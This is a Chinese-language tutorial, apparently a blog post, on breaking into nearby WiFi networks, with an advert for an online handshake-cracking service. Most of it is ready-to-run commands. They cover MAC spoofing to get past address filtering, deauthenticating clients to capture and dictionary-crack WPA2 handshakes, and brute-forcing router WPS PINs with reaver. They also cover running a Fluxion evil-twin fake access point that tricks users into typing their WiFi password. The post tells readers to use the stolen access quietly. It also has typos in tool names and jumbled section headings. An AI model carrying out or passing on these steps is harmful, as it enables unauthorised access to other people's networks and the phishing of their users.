【无线安全实践入门】破解WiFi密码的多个方法

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

本文希望可以帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.
文中可能存在错误操作或错误理解,望大家不吝指正.

本文将介绍多种破解WiFi密码的方法,以帮助读者入门【无线安全实践】。内容包括方法的使用示例、应用技巧、基本知识总结和注意事项,对于需要参考的朋友具有一定的价值。

--首先,先要切换到能够支持'混杂模式'的网卡(一般都是购买USB无线网卡)
--开启混杂模式(开启之后,网卡名可能会改变)
> ifconfig (网卡名) down
> iwconfig (网卡名) mode monitor
> ifconfig (网卡名) up

在阅读之前,请注意以下几点。本文是基于我几年前的笔记本,记录了我学习网络基础时的一些笔记。其中的工具可能已经过时,或者使用方法已经改变。如果感兴趣,可以深入查阅相关资料(但我仍然列出以前的使用方法供大家参考)。另外,如果对无线攻击手段和ARP欺骗感兴趣,可以参考以下两篇文章:【无线安全实践入门】基础攻击手段与常用工具简介,【无线安全实践入门】网络扫描和ARP欺骗。本文的环境是在Kali下,学习时最好具备一些Linux基础知识。此外,本文中的”混杂模式”并非所有网卡都支持,请搜索支持的网卡型号。第一节和第二节的方法受限于硬件配置等因素,破解时间过长也是正常的。

  1. Aircrack-ng套件
    Aircrack-ng是一套非常优秀的无线网络分析工具,功能强大。许多安全软件套件都默认使用此套件来完成操作。
--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等)
> airodump-ng (网卡名)
--得知详细信息后,可以停止查看(ctrl+c)
--开始拿有效的mac地址信息(尽量等久点,包多点)
> airodump-ng -c (信道channel) --bssid (BSSID(MAC) (网卡名)
--拿到有效mac地址(不要拿到路由器的mac)
--修改本机mac
> ifconfig (网卡名) down
> macchanger -m (MAC地址) (网卡名)
> ifconfig (网卡名) up
--注意,此方法拿到有效mac地址,并未拿到wifi密码

cap握手包破解工具

--查看附件网络中的wifi,并观察其详细信息(channel、BSSID(MAC)等)
> airodump-ng (网卡名)
--得知详细信息后,可以停止查看(ctrl+c)
--开始进行查看route与client的mac地址,[-w]选项的意思就是write
> airodump-ng -w wpa -c (信道channel) --bssid (BSSID(MAC) (网卡名) --ignore-negative-one
--查看route与client的mac地址
--开始获得握手包.cap
> airoplay-ng --deauth 10 -a (route的mac) -c (client的mac) (网卡名) --ignore-negative-one
--对握手包.cap进行破解
aircrack-ng -w (指定字典) (cap握手包名)
--字典可以自己制作(Crunch工具),也可以在网上下载大神的字典
--一个NB的字典,对你的破解!事半功倍!
--由于这种加密基本已经舍弃了,所以就不说了

cap握手包破解工具

1.1 连接MAC地址绑定的WiFi
1.2 破解WPA2加密的WiFi
1.3 破解WEP加密的WiFi

  1. 路由器的PIN码破解
    通过输入PIN码来连接WiFi也是一种方法。常见的工具有reaver、minidwep-gtk等,这里我将介绍reaver工具。
--首先,先要切换到能够支持'混杂模式'的网卡(一般都是购买USB无线网卡)
--开启混杂模式(开启之后,网卡名可能会改变)
> ifconfig (网卡名) down
> iwconfig (网卡名) mode monitor
> ifconfig (网卡名) up
--选做:可以尝试扫描是否有启用WPS的wifi
--Wash工具就是一款针对'判断wifi是否启用WPS'的工具
--查看附件网络中的wifi,并观察PWR值小于70的来破解(记录BSSID,记住要是路由器的)
> airodump-ng (网卡名)
--开始进行破解(注意是路由器的MAC地址,PIN码是针对路由器的)
> reaver -i (网卡名) -b (路由器MAC地址) -a -S -vv
--1.如果出现 warning fail to associate ...
--则说明破解失败(失败原因包括对象路由器未开启WPS等)
--2.提示给出了 PIN码 或 PIN码和PSK密钥(wifi密码)
--则说明破解成功(记录PIN码)/(使用PSK密钥直接尝试连接wifi)
--选做:可以尝试得到wifi密码(PIN码是可以连wifi)
reaver -i (网卡名) -b (路由器MAC地址) -p (刚得到的PIN码)

cap握手包破解工具

  1. Fluxion工具(推荐)
    Fluxion是一个非常不错的社交工程破解WiFi的工具。与前面的操作思路不同,它通过模拟原有WiFi(FakeAP)来引导用户进行连接,然后断开网络并向连接用户发送请求(浏览器跳转页面),要求输入原WiFi密码。
--运行软件(在软件目录下)
> ./fluxion
> 网卡(选择网卡)
> channels(选择所有信道)
> 扫描wifi(扫描到需要的结果时,按ctrl+c)
> 选择wifi(输入1、2、3等选择)
--建立一个假AP
> 选择攻击方式(选FakeAP-Hostapd...)
> 选择保存路径(可空格跳过,则保存在桌面/root/Desktop/)
--会自动出现窗口
> 握手包选择(aircrack-ng...)
--抓包分配包
> 数据包分配(Deauth all)
--若是以上步骤正确完成,等抓包抓完,会出现选择
> 选择web interface
> 选择语言(提示用户输入密码时的界面语言)
--等待用户连接上网,在浏览器输入正确密码(工具会自动验证密码是否正确),工具就会自动停止
--获得wifi正确密码

用户在收到请求后,只需输入正确密码,WiFi就会恢复网络,而你获得了WiFi密码。值得注意的是,Fluxion会自动判断WiFi密码是否正确,并做出下一步操作。请注意,Fluxion运行时需要调用许多其他工具,部分工具可能需要另行下载(运行时会有提示未下载的工具)。

赞(0)